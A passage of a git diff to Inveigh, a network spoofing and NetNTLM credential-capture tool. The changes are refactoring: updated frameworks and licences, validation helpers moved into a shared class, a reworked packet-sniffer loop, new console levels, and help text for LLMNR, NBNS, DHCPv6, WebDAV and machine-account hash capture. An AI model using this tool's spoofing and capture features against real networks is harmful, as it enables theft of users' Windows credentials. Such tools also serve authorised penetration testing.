a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenInit.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenInit.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenResp.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenResp.cs index 5b4e27c..37747c8 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenResp.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/SPNEGO/SPNEGONegTokenResp.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/TCP/TCPHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/TCP/TCPHeader.cs index 28c3ba9..7e5c059 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/TCP/TCPHeader.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/TCP/TCPHeader.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/UDP/UDPHeader.cs b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/UDP/UDPHeader.cs index f6e8671..34ffa84 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Protocols/UDP/UDPHeader.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Protocols/UDP/UDPHeader.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Quiddity.csproj b/Inveigh/Protocols/Quiddity/Quiddity/Quiddity.csproj index 4b462b6..597c46a 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Quiddity.csproj +++ b/Inveigh/Protocols/Quiddity/Quiddity/Quiddity.csproj @@ -1,13 +1,10 @@ <Project Sdk="Microsoft.NET.Sdk"> <PropertyGroup> - <TargetFrameworks>net35;net45;net5.0</TargetFrameworks> + <TargetFrameworks>net35;net462;net6.0</TargetFrameworks> </PropertyGroup> <PropertyGroup> - <!-- https://github.com/dotnet/msbuild/issues/1333#issuecomment-296346352 --> - <FrameworkPathOverride Condition="'$(TargetFramework)' == 'net35'">$(MSBuildProgramFiles32)\Reference Assemblies\Microsoft\Framework\.NETFramework\v3.5\Profile\Client</FrameworkPathOverride> - <AutomaticallyUseReferenceAssemblyPackages Condition=" '$(TargetFramework)' == 'net35' ">false</AutomaticallyUseReferenceAssemblyPackages> <Version>0.0.0-alpha</Version> <Authors>Kevin Robertson</Authors> <Company /> @@ -23,24 +20,22 @@ <FileVersion>0.0.0.0</FileVersion> </PropertyGroup> - <ItemGroup Condition="'$(TargetFramework)' == 'net35'"> - <Reference Include="System.DirectoryServices.Protocols"> - <HintPath>$(WINDIR)\Microsoft.NET\Framework64\v2.0.50727\System.DirectoryServices.Protocols.dll</HintPath> - <private>False</private> - </Reference> - </ItemGroup> - + <ItemGroup Condition="'$(TargetFramework)' == 'net35'"> + <Reference Include="System.DirectoryServices.Protocols"> + <HintPath>$(WINDIR)\Microsoft.NET\Framework64\v2.0.50727\System.DirectoryServices.Protocols.dll</HintPath> + <private>False</private> + </Reference> + </ItemGroup> - <ItemGroup Condition="'$(TargetFramework)' == 'net45'"> + <ItemGroup Condition="'$(TargetFramework)' == 'net462'"> <PackageReference Include="System.DirectoryServices.Protocols"> - <Version>5.0</Version> + <Version>6.0.1</Version> </PackageReference> </ItemGroup> - - <ItemGroup Condition="'$(TargetFramework)' == 'net5.0'"> + <ItemGroup Condition="'$(TargetFramework)' == 'net6.0'"> <PackageReference Include="System.DirectoryServices.Protocols"> - <Version>5.0</Version> + <Version>6.0.1</Version> </PackageReference> </ItemGroup> diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Support/ASN1.cs b/Inveigh/Protocols/Quiddity/Quiddity/Support/ASN1.cs index b1862c7..7c3e006 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Support/ASN1.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Support/ASN1.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without diff --git a/Inveigh/Protocols/Quiddity/Quiddity/Support/Utilities.cs b/Inveigh/Protocols/Quiddity/Quiddity/Support/Utilities.cs index 51c994a..ca1811b 100644 --- a/Inveigh/Protocols/Quiddity/Quiddity/Support/Utilities.cs +++ b/Inveigh/Protocols/Quiddity/Quiddity/Support/Utilities.cs @@ -1,7 +1,7 @@ /* * BSD 3-Clause License * - * Copyright (c) 2021, Kevin Robertson + * Copyright (c) 2022, Kevin Robertson * All rights reserved. * * Redistribution and use in source and binary forms, with or without @@ -33,6 +33,9 @@ using System; using System.Collections.Generic; using System.IO; using System.Linq; +using System.Net; +using System.Net.NetworkInformation; +using System.Net.Sockets; using System.Text; namespace Quiddity.Support @@ -120,6 +123,228 @@ namespace Quiddity.Support } + public static string GetLocalIPAddress(string ipVersion) + { + + List<string> ipAddressList = new List<string>(); + AddressFamily addressFamily; + + if (string.Equals(ipVersion, "IPv4")) + { + addressFamily = AddressFamily.InterNetwork; + } + else + { + addressFamily = AddressFamily.InterNetworkV6; + } + + foreach (NetworkInterface networkInterface in NetworkInterface.GetAllNetworkInterfaces()) + { + + if (networkInterface.NetworkInterfaceType == NetworkInterfaceType.Ethernet && networkInterface.OperationalStatus == OperationalStatus.Up) + { + + foreach (UnicastIPAddressInformation ip in networkInterface.GetIPProperties().UnicastAddresses) + { + + if (ip.Address.AddressFamily == addressFamily) + { + ipAddressList.Add(ip.Address.ToString()); + } + + } + + } + + } + + return ipAddressList.FirstOrDefault(); + } + + public static string GetLocalMACAddress(string ipAddress) + { + List<string> macAddressList = new List<string>(); + + foreach (NetworkInterface networkInterface in NetworkInterface.GetAllNetworkInterfaces()) + { + + if (networkInterface.NetworkInterfaceType == NetworkInterfaceType.Ethernet && networkInterface.OperationalStatus == OperationalStatus.Up) + { + + foreach (UnicastIPAddressInformation ip in networkInterface.GetIPProperties().UnicastAddresses) + { + + if (ip.Address.AddressFamily == AddressFamily.InterNetworkV6 && string.Equals(ip.Address.ToString(), ipAddress)) + { + macAddressList.Add(networkInterface.GetPhysicalAddress().ToString()); + } + + } + + } + + } + + return macAddressList.FirstOrDefault(); + } + + public static int GetNetworkInterfaceIndex(string ipAddress) + { + int index = 0; + + foreach (NetworkInterface networkInterface in NetworkInterface.GetAllNetworkInterfaces()) + { + + if (networkInterface.NetworkInterfaceType == NetworkInterfaceType.Ethernet && networkInterface.OperationalStatus == OperationalStatus.Up) + { + + foreach (UnicastIPAddressInformation ip in networkInterface.GetIPProperties().UnicastAddresses) + { + + if (ip.Address.AddressFamily == AddressFamily.InterNetworkV6 && string.Equals(ip.Address.ToString(), ipAddress)) + { + index = networkInterface.GetIPProperties().GetIPv6Properties().Index; + break; + } + else if (ip.Address.AddressFamily == AddressFamily.InterNetwork && string.Equals(ip.Address.ToString(), ipAddress)) + { + index = networkInterface.GetIPProperties().GetIPv4Properties().Index; + break; + } + + } + + } + + } + + return index; + } + + public static bool ValidateStringArguments(string[] arguments, string[] values, string[] validValues) + { + int i = 0; + foreach (string value in values) + { + + if (!validValues.Contains(value)) + { + Console.WriteLine(arguments[i].Substring(3) + " value must be " + string.Join("/", validValues)); + return false; + } + + i++; + } + + return true; + } + + public static bool ValidateStringArrayArguments(string argument, string[] values, string[] validValues) + { + + foreach (string value in values) + { + + if (!validValues.Contains(value)) + { + Console.WriteLine(argument.Substring(3) + " value must be " + string.Join("/", validValues)); + return false; + } + + } + + return true; + } + + public static bool ValidateIntArguments(string[] arguments, string[] values) + { + + int i = 0; + foreach (string value in values) + { + + if (!string.IsNullOrEmpty(value)) + { + + try + { + Int32.Parse(value); + return true; + + } + catch + { + Console.WriteLine(arguments[i].Substring(3) + " value must be an integer"); + return false; + } + + } + + i++; + } + + return true; + } + + public static bool ValidateIntArrayArguments(string argument, string[] values) + { + + int i = 0; + foreach (string value in values) + { + + if (!string.IsNullOrEmpty(value)) + { + + try + { + int.Parse(value); + return true; + + } + catch + { + Console.WriteLine(argument.Substring(3) + " values must be integers"); + return false; + } + + } + + i++; + } + + return true; + } + + public static bool ValidateIPAddressArguments(string[] arguments, string[] values) + { + + int i = 0; + foreach (string value in values) + { + + if (!string.IsNullOrEmpty(value)) + { + + try + { + IPAddress.Parse(value); + return true; + + } + catch + { + Console.WriteLine(arguments[i].Substring(3) + " value must be an IP address"); + return false; + } + + } + + i++; + } + + return true; + } } diff --git a/Inveigh/Sniffer/Sniffer.cs b/Inveigh/Sniffer/Sniffer.cs index 36106cf..de8fa77 100644 --- a/Inveigh/Sniffer/Sniffer.cs +++ b/Inveigh/Sniffer/Sniffer.cs @@ -21,6 +21,8 @@ namespace Inveigh { class Sniffer { + public static bool isRunning = false; + public static void Start(string protocol, string snifferIP, bool isIPV6) { byte[] snifferIn = new byte[4] { 1, 0, 0, 0 }; @@ -31,6 +33,7 @@ namespace Inveigh IPEndPoint snifferIPEndPoint; EndPoint snifferEndPoint; AddressFamily addressFamily = AddressFamily.InterNetwork; + IAsyncResult ipAsync; if (isIPV6) { @@ -87,9 +90,10 @@ namespace Inveigh throw; } - int packetLength; + int packetLength = 0; + isRunning = true; - while (Program.isRunning) + while (isRunning) { try @@ -98,17 +102,35 @@ namespace Inveigh SocketFlags socketFlags = SocketFlags.None; try - { - packetLength = snifferSocket.ReceiveMessageFrom(snifferBuffer, 0, snifferBuffer.Length, ref socketFlags, ref snifferEndPoint, out packetInformation); - snifferData = new byte[packetLength]; - Buffer.BlockCopy(snifferBuffer, 0, snifferData, 0, packetLength); + { + ipAsync = snifferSocket.BeginReceiveMessageFrom(snifferBuffer, 0, snifferBuffer.Length, socketFlags, ref snifferEndPoint, null, null); + + do + { + Thread.Sleep(10); + + if (!isRunning) + { + break; + } + + } + while (!ipAsync.IsCompleted); + + if (isRunning) + { + packetLength = snifferSocket.EndReceiveMessageFrom(ipAsync, ref socketFlags, ref snifferEndPoint, out packetInformation); + snifferData = new byte[packetLength]; + Buffer.BlockCopy(snifferBuffer, 0, snifferData, 0, packetLength); + } + } catch { packetLength = 0; } - - if (packetLength > 0) + + if (packetLength > 0 && isRunning) { IPHeader ipHeader = new IPHeader(); MemoryStream memoryStream = new MemoryStream(snifferData, 0, packetLength); diff --git a/Inveigh/Sockets/ICMPv6Socket.cs b/Inveigh/Sockets/ICMPv6Socket.cs index d4f7461..87f895a 100644 --- a/Inveigh/Sockets/ICMPv6Socket.cs +++ b/Inveigh/Sockets/ICMPv6Socket.cs @@ -1,6 +1,7 @@ using Quiddity.ICMPv6; using Quiddity.Support; using System; +using System.Diagnostics; using System.Linq; using System.Net; using System.Net.Sockets; @@ -12,9 +13,10 @@ namespace Inveigh { internal void Start() { - Program.icmpv6Interval *= 1000; string responseMessage = " "; byte[] spooferIPv6Data = IPAddress.Parse(Program.argSpooferIPv6).GetAddressBytes(); + Stopwatch stopwatchInterval = new Stopwatch(); + stopwatchInterval.Start(); while (Program.isRunning && Program.enabledICMPv6) { @@ -91,7 +93,14 @@ namespace Inveigh if (Program.icmpv6Interval > 0) { - Thread.Sleep(Program.icmpv6Interval); + + while (Program.isRunning && stopwatchInterval.Elapsed.Seconds <= Program.icmpv6Interval) + { + Thread.Sleep(10); + } + + stopwatchInterval.Reset(); + stopwatchInterval.Start(); } else { diff --git a/Inveigh/Support/Arguments.cs b/Inveigh/Support/Arguments.cs index c3fc8f2..4c87530 100644 --- a/Inveigh/Support/Arguments.cs +++ b/Inveigh/Support/Arguments.cs @@ -12,7 +12,7 @@ namespace Inveigh { class Arguments { - public static void ValidateArguments() + public static bool ValidateArguments() { string[] ynArguments = @@ -103,28 +103,29 @@ namespace Inveigh Program.argRunTime }; - ValidateStringArguments(ynArguments, ynArgumentValues, new string[] { "Y", "N" }); - ValidateStringArguments(new string[] { nameof(Program.argConsole) }, new string[] { Program.argConsole }, new string[] { "0", "1", "2", "3", "4" }); + bool allValid = true; + allValid &= Utilities.ValidateStringArguments(ynArguments, ynArgumentValues, new string[] { "Y", "N" }); + allValid &= Utilities.ValidateStringArguments(new string[] { nameof(Program.argConsole) }, new string[] { Program.argConsole }, new string[] { "0", "1", "2", "3", "4", "5" }); string[] authArguments = { nameof(Program.argHTTPAuth), nameof(Program.argProxyAuth), nameof(Program.argWPADAuth), nameof(Program.argWebDAVAuth) }; string[] authArgumentValues = { Program.argHTTPAuth, Program.argProxyAuth, Program.argWPADAuth, Program.argWebDAVAuth }; - ValidateStringArguments(authArguments, authArgumentValues, new string[] { "ANONYMOUS", "BASIC", "NTLM" }); - ValidateStringArrayArguments(nameof(Program.argDNSTypes), Program.argDNSTypes, new string[] { "A", "SOA", "SRV" }); - ValidateStringArrayArguments(nameof(Program.argDNSSRV), Program.argDNSSRV, new string[] { "LDAP", "KERBEROS", "KPASSWORD", "GC" }); - ValidateStringArrayArguments(nameof(Program.argNBNSTypes), Program.argNBNSTypes, new string[] { "00", "03", "20", "1B", "1C", "1D", "1E" }); - ValidateStringArrayArguments(nameof(Program.argMDNSQuestions), Program.argMDNSQuestions, new string[] { "QM", "QU" }); - ValidateStringArrayArguments(nameof(Program.argMDNSTypes), Program.argMDNSTypes, new string[] { "A", "AAAA", "ANY" }); - ValidateStringArrayArguments(nameof(Program.argLLMNRTypes), Program.argLLMNRTypes, new string[] { "A", "AAAA", "ANY" }); - ValidateIntArguments(intArguments, intArgumentValues); + allValid &= Utilities.ValidateStringArguments(authArguments, authArgumentValues, new string[] { "ANONYMOUS", "BASIC", "NTLM" }); + allValid &= Utilities.ValidateStringArrayArguments(nameof(Program.argDNSTypes), Program.argDNSTypes, new string[] { "A", "SOA", "SRV" }); + allValid &= Utilities.ValidateStringArrayArguments(nameof(Program.argDNSSRV), Program.argDNSSRV, new string[] { "LDAP", "KERBEROS", "KPASSWORD", "GC" }); + allValid &= Utilities.ValidateStringArrayArguments(nameof(Program.argNBNSTypes), Program.argNBNSTypes, new string[] { "00", "03", "20", "1B", "1C", "1D", "1E" }); + allValid &= Utilities.ValidateStringArrayArguments(nameof(Program.argMDNSQuestions), Program.argMDNSQuestions, new string[] { "QM", "QU" }); + allValid &= Utilities.ValidateStringArrayArguments(nameof(Program.argMDNSTypes), Program.argMDNSTypes, new string[] { "A", "AAAA", "ANY" }); + allValid &= Utilities.ValidateStringArrayArguments(nameof(Program.argLLMNRTypes), Program.argLLMNRTypes, new string[] { "A", "AAAA", "ANY" }); + allValid &= Utilities.ValidateIntArguments(intArguments, intArgumentValues); string[] ipAddressArguments = { nameof(Program.argSnifferIP), nameof(Program.argSnifferIPv6), nameof(Program.argListenerIP), nameof(Program.argListenerIPv6), nameof(Program.argSpooferIP), nameof(Program.argSpooferIPv6) }; string[] ipAddressArgumentValues = { Program.argSnifferIP, Program.argSnifferIPv6, Program.argListenerIP, Program.argListenerIPv6, Program.argSpooferIP, Program.argSpooferIPv6 }; - ValidateIPAddressArguments(ipAddressArguments, ipAddressArgumentValues); - ValidateIntArrayArguments(nameof(Program.argHTTPPorts), Program.argHTTPPorts); + allValid &= Utilities.ValidateIPAddressArguments(ipAddressArguments, ipAddressArgumentValues); + allValid &= Utilities.ValidateIntArrayArguments(nameof(Program.argHTTPPorts), Program.argHTTPPorts); Regex r = new Regex("^[A-Fa-f0-9]{16}$"); if (!string.IsNullOrEmpty(Program.argChallenge) && !r.IsMatch(Program.argChallenge)) { Console.WriteLine("Challenge is invalid"); - Environment.Exit(0); + allValid = false; } r = new Regex("^[A-Fa-f0-9]{12}$"); @@ -132,20 +133,22 @@ namespace Inveigh if (!string.IsNullOrEmpty(Program.argMAC) && !r.IsMatch(Program.argMAC)) { Console.WriteLine("MAC address is invalid"); - Environment.Exit(0); + allValid = false; } if ((Program.argDNSTypes.Contains("SOA") || Program.argDNSTypes.Contains("SRV")) && (string.IsNullOrEmpty(Program.argDNSHost) || Program.argDNSHost.Split('.').Count() < 3)) { - Console.WriteLine("DNSHost must be specified and fully qualified when using DNSTypes SOA or SRV"); Environment.Exit(0); + Console.WriteLine("DNSHost must be specified and fully qualified when using DNSTypes SOA or SRV"); + allValid = false; } if (string.Equals(Program.argFileOutput, "Y") && !Directory.Exists(Program.argFileDirectory)) { Console.WriteLine("FileOutputDirectory is invalid"); - Environment.Exit(0); + allValid = false; } + return allValid; } public static void ParseArguments() @@ -188,7 +191,7 @@ namespace Inveigh if (string.Equals(Program.argSniffer, "Y")) { Program.enabledSniffer = true; } if (!Program.enabledWindows) { Program.enabledSniffer = false; } if (string.Equals(Program.argSMB, "Y")) { Program.enabledSMB = true; } - if (string.Equals(Program.argWebDAV, "Y")) { Program.enabledWebDAV = true; } + if (string.Equals(Program.argWebDAV, "Y") && (string.Equals(Program.argHTTP, "Y") || string.Equals(Program.argHTTPS, "Y"))) { Program.enabledWebDAV = true; } if (string.Equals(Program.argLocal, "Y")) { Program.enabledLocal = true; } if (string.Equals(Program.argRepeat, "Y")) { Program.enabledRepeat = true; } @@ -215,7 +218,7 @@ namespace Inveigh if (Program.enabledIPv4 && string.IsNullOrEmpty(Program.argSnifferIP)) { - Program.argSnifferIP = GetLocalIPAddress("IPv4"); + Program.argSnifferIP = Utilities.GetLocalIPAddress("IPv4"); if (string.IsNullOrEmpty(Program.argSnifferIP)) { @@ -226,7 +229,7 @@ namespace Inveigh if (Program.enabledIPv6 && string.IsNullOrEmpty(Program.argSnifferIPv6)) { - Program.argSnifferIPv6 = GetLocalIPAddress("IPv6"); + Program.argSnifferIPv6 = Utilities.GetLocalIPAddress("IPv6"); if (string.IsNullOrEmpty(Program.argSnifferIPv6)) { @@ -258,7 +261,7 @@ namespace Inveigh } else { - Program.argSpooferIP = GetLocalIPAddress("IPv4"); + Program.argSpooferIP = Utilities.GetLocalIPAddress("IPv4"); if (string.IsNullOrEmpty(Program.argSpooferIP)) { @@ -278,7 +281,7 @@ namespace Inveigh } else { - Program.argSpooferIPv6 = GetLocalIPAddress("IPv6"); + Program.argSpooferIPv6 = Utilities.GetLocalIPAddress("IPv6"); if (string.IsNullOrEmpty(Program.argSpooferIPv6)) { @@ -351,11 +354,11 @@ namespace Inveigh if (string.IsNullOrEmpty(Program.argSnifferIPv6)) { - Program.argMAC = GetLocalMACAddress(GetLocalIPAddress("IPv6")); + Program.argMAC = Utilities.GetLocalMACAddress(Utilities.GetLocalIPAddress("IPv6")); } else { - Program.argMAC = GetLocalMACAddress(Program.argSnifferIPv6); + Program.argMAC = Utilities.GetLocalMACAddress(Program.argSnifferIPv6); } } @@ -365,12 +368,12 @@ namespace Inveigh if (!string.IsNullOrEmpty(Program.argSnifferIP)) { - Program.networkInterfaceIndexIPv4 = GetNetworkInterfaceIndex(Program.argSniffer); + Program.networkInterfaceIndexIPv4 = Utilities.GetNetworkInterfaceIndex(Program.argSniffer); } if (!string.IsNullOrEmpty(Program.argSnifferIPv6)) { - Program.networkInterfaceIndexIPv6 = GetNetworkInterfaceIndex(Program.argSnifferIPv6); + Program.networkInterfaceIndexIPv6 = Utilities.GetNetworkInterfaceIndex(Program.argSnifferIPv6); } if (Program.enabledInspect) @@ -401,221 +404,6 @@ namespace Inveigh } } - public static void ValidateStringArguments(string[] arguments, string[] values, string[] validValues) - { - int i = 0; - foreach (string value in values) - { - - if (!validValues.Contains(value)) - { - Console.WriteLine(arguments[i].Substring(3) + " value must be " + string.Join("/", validValues)); - Environment.Exit(0); - } - - i++; - } - - } - - public static void ValidateStringArrayArguments(string argument, string[] values, string[] validValues) - { - - foreach (string value in values) - { - - if (!validValues.Contains(value)) - { - Console.WriteLine(argument.Substring(3) + " value must be " + string.Join("/", validValues)); - Environment.Exit(0); - } - - } - - } - - public static void ValidateIntArguments(string[] arguments, string[] values) - { - - int i = 0; - foreach (string value in values) - { - - if (!string.IsNullOrEmpty(value)) - { - - try - { - Int32.Parse(value); - - } - catch - { - Console.WriteLine(arguments[i].Substring(3) + " value must be an integer"); - Environment.Exit(0); - } - - } - - i++; - } - - } - - public static void ValidateIntArrayArguments(string argument, string[] values) - { - - int i = 0; - foreach (string value in values) - { - - if (!string.IsNullOrEmpty(value)) - { - - try - { - int.Parse(value); - - } - catch - { - Console.WriteLine(argument.Substring(3) + " values must be integers"); - Environment.Exit(0); - } - - } - - i++; - } - - } - - public static void ValidateIPAddressArguments(string[] arguments, string[] values) - { - - int i = 0; - foreach (string value in values) - { - - if (!string.IsNullOrEmpty(value)) - { - - try - { - IPAddress.Parse(value); - - } - catch - { - Console.WriteLine(arguments[i].Substring(3) + " value must be an IP address"); - Environment.Exit(0); - } - - } - - i++; - } - - } - - public static string GetLocalIPAddress(string ipVersion) - { - - List<string> ipAddressList = new List<string>(); - AddressFamily addressFamily; - - if (string.Equals(ipVersion, "IPv4")) - { - addressFamily = AddressFamily.InterNetwork; - } - else - { - addressFamily = AddressFamily.InterNetworkV6; - } - - foreach (NetworkInterface networkInterface in NetworkInterface.GetAllNetworkInterfaces()) - { - - if (networkInterface.NetworkInterfaceType == NetworkInterfaceType.Ethernet && networkInterface.OperationalStatus == OperationalStatus.Up) - { - - foreach (UnicastIPAddressInformation ip in networkInterface.GetIPProperties().UnicastAddresses) - { - - if (ip.Address.AddressFamily == addressFamily) - { - ipAddressList.Add(ip.Address.ToString()); - } - - } - - } - - } - - return ipAddressList.FirstOrDefault(); - } - - public static string GetLocalMACAddress(string ipAddress) - { - List<string> macAddressList = new List<string>(); - - foreach (NetworkInterface networkInterface in NetworkInterface.GetAllNetworkInterfaces()) - { - - if (networkInterface.NetworkInterfaceType == NetworkInterfaceType.Ethernet && networkInterface.OperationalStatus == OperationalStatus.Up) - { - - foreach (UnicastIPAddressInformation ip in networkInterface.GetIPProperties().UnicastAddresses) - { - - if (ip.Address.AddressFamily == AddressFamily.InterNetworkV6 && string.Equals(ip.Address.ToString(), ipAddress)) - { - macAddressList.Add(networkInterface.GetPhysicalAddress().ToString()); - } - - } - - } - - } - - return macAddressList.FirstOrDefault(); - } - - public static int GetNetworkInterfaceIndex(string ipAddress) - { - int index = 0; - - foreach (NetworkInterface networkInterface in NetworkInterface.GetAllNetworkInterfaces()) - { - - if (networkInterface.NetworkInterfaceType == NetworkInterfaceType.Ethernet && networkInterface.OperationalStatus == OperationalStatus.Up) - { - - foreach (UnicastIPAddressInformation ip in networkInterface.GetIPProperties().UnicastAddresses) - { - - if (ip.Address.AddressFamily == AddressFamily.InterNetworkV6 && string.Equals(ip.Address.ToString(), ipAddress)) - { - index = networkInterface.GetIPProperties().GetIPv6Properties().Index; - break; - } - else if (ip.Address.AddressFamily == AddressFamily.InterNetwork && string.Equals(ip.Address.ToString(), ipAddress)) - { - index = networkInterface.GetIPProperties().GetIPv4Properties().Index; - break; - } - - } - - } - - } - - return index; - } - } } diff --git a/Inveigh/Support/Control.cs b/Inveigh/Support/Control.cs index 9717f4f..b635763 100644 --- a/Inveigh/Support/Control.cs +++ b/Inveigh/Support/Control.cs @@ -123,8 +123,13 @@ namespace Inveigh Output.Queue(String.Format("[+] Inveigh exited at {0}", DateTime.Now.ToString("s"))); Output.ProcessOutput(); Output.ProcessFileOutput(); - Program.isRunning = false; + Sniffer.isRunning = false; Quiddity.HTTPListener.isRunning = false; + Quiddity.LDAPListener.isRunning = false; + Quiddity.SMBListener.isRunning = false; + Quiddity.DNSListener.isRunning = false; + Quiddity.DHCPv6Listener.isRunning = false; + Program.isRunning = false; while (Program.consoleList.Count > 0) { @@ -245,6 +250,7 @@ namespace Inveigh public static void StartThreads() { + Thread llmnrListenerThread = null; if (Program.enabledSniffer) { @@ -294,7 +300,7 @@ namespace Inveigh if (Program.enabledLLMNR) { LLMNRListener llmnrListener = new LLMNRListener(uint.Parse(Program.argLLMNRTTL)); - Thread llmnrListenerThread = new Thread(() => llmnrListener.Start(IPAddress.Parse(Program.argListenerIP), Program.argSpooferIP, Program.argSpooferIPv6)); + llmnrListenerThread = new Thread(() => llmnrListener.Start(IPAddress.Parse(Program.argListenerIP), Program.argSpooferIP, Program.argSpooferIPv6)); llmnrListenerThread.Start(); } @@ -308,7 +314,7 @@ namespace Inveigh if (Program.enabledNBNS) { NBNSListener nbnsListener = new NBNSListener(uint.Parse(Program.argNBNSTTL)); - Thread nbnsListenerThread = new Thread(() => nbnsListener.Start(IPAddress.Parse(Program.argListenerIP), Program.argSpooferIP, Program.argSpooferIPv6)); + Thread nbnsListenerThread = new Thread(() => nbnsListener.Start(IPAddress.Parse(Program.argListenerIP), Program.argSpooferIP)); nbnsListenerThread.Start(); } @@ -331,7 +337,7 @@ namespace Inveigh } - } + } if (Program.enabledIPv6) { @@ -386,6 +392,7 @@ namespace Inveigh } + } if (!Program.enabledInspect) diff --git a/Inveigh/Support/Output.cs b/Inveigh/Support/Output.cs index 1a0aaf7..d44c10f 100644 --- a/Inveigh/Support/Output.cs +++ b/Inveigh/Support/Output.cs @@ -130,6 +130,11 @@ namespace Inveigh Console.WriteLine(); } + public static void OutputCommand(string message) + { + Console.WriteLine(message); + } + public static void OutputCommand(string description, string[] headings, IList<string> list, ConsoleColor color) { Console.ForegroundColor = color; @@ -791,6 +796,11 @@ namespace Inveigh { bool nullarg = true; + if (!string.IsNullOrEmpty(arg)) + { + nullarg = false; + } + Console.WriteLine(); if (nullarg) @@ -844,7 +854,7 @@ namespace Inveigh if (nullarg || string.Equals(arg, "CONSOLE")) { string argument = "Console"; - string description = "Default=4: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no disabled, no informational, 3=no disabled, 4=all)"; + string description = "Default=5: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no disabled, no informational, 3=no disabled, no filtered, 4=no disabled, 5=all)"; OutputHelp(argument, description); } @@ -983,8 +993,8 @@ namespace Inveigh if (nullarg || string.Equals(arg, "ICMPV6TTL")) { - string argument = "ICMPV6TTL"; - string description = "Default=1800: ICMPv6 TTL in seconds."; + string argument = "ICMPv6TTL"; + string description = "Default=300: ICMPv6 TTL in seconds."; OutputHelp(argument, description); } @@ -1261,10 +1271,10 @@ namespace Inveigh OutputHelp(argument, description); } - if (nullarg || string.Equals(arg, "MACHINEACCOUNTS")) + if (nullarg || string.Equals(arg, "MACHINEACCOUNT")) { - string argument = "Machines"; - string description = "Default=Disabled: (Y/N) machine account NetNTLM captures."; + string argument = "MachineAccount"; + string description = "Default=Enabled: (Y/N) machine account NetNTLM captures."; OutputHelp(argument, description); } @@ -1353,12 +1363,17 @@ namespace Inveigh while (Program.outputList.Count > 0) { - if (Program.console == 4) + if (Program.console == 5) + { + Program.consoleList.Add(Program.outputList[0]); + } + + if (Program.console == 4 && (Program.outputList[0].StartsWith("[*]") || Program.outputList[0].StartsWith("[+]") || Program.outputList[0].StartsWith("[-]") || Program.outputList[0].StartsWith("[.]") || !Program.outputList[0].StartsWith("["))) { Program.consoleList.Add(Program.outputList[0]); } - if (Program.console == 3 && (Program.outputList[0].StartsWith("[*]") || Program.outputList[0].StartsWith("[+]") || Program.outputList[0].StartsWith("[-]") || Program.outputList[0].StartsWith("[.]") || !Program.outputList[0].StartsWith("["))) + if (Program.console == 3 && (Program.outputList[0].StartsWith("[*]") || Program.outputList[0].StartsWith("[+]") || Program.outputList[0].StartsWith("[.]") || !Program.outputList[0].StartsWith("["))) { Program.consoleList.Add(Program.outputList[0]); } diff --git a/Inveigh/Support/Shell.cs b/Inveigh/Support/Shell.cs index 522e0be..bfe5037 100644 --- a/Inveigh/Support/Shell.cs +++ b/Inveigh/Support/Shell.cs @@ -42,6 +42,7 @@ namespace Inveigh "get ignoreips", "get ignoredomains", "get ignoremacs", + "set console", "history", "resume", "stop" @@ -372,12 +373,12 @@ namespace Inveigh public static void Commands(string inputCommand) { string[] inputArray = inputCommand.Split(' '); - string search = ""; + string value = ""; if (!Utilities.ArrayIsNullOrEmpty(inputArray) && inputArray.Length == 3) { inputCommand = string.Concat(inputArray[0], " ", inputArray[1]); - search = inputArray[2]; + value = inputArray[2]; } inputCommand = inputCommand.ToUpper(); @@ -396,43 +397,43 @@ namespace Inveigh break; case "GET LOG": - GetLog(search); + GetLog(value); break; case "GET CLEARTEXT": - GetCleartext(search); + GetCleartext(value); break; case "GET CLEARTEXTUNIQUE": - GetCleartextUnique(search); + GetCleartextUnique(value); break; case "GET DHCPV6LEASES": - GetDHCPv6Leases(search); + GetDHCPv6Leases(value); break; case "GET NTLMV1": - GetNTLMv1(search); + GetNTLMv1(value); break; case "GET NTLMV1UNIQUE": - GetNTLMv1Unique(search); + GetNTLMv1Unique(value); break; case "GET NTLMV1USERNAMES": - GetNTLMv1Usernames(search); + GetNTLMv1Usernames(value); break; case "GET NTLMV2": - GetNTLMv2(search); + GetNTLMv2(value); break; case "GET NTLMV2UNIQUE": - GetNTLMv2Unique(search); + GetNTLMv2Unique(value); break; case "GET NTLMV2USERNAMES": - GetNTLMv2Usernames(search); + GetNTLMv2Usernames(value); break; case "GET 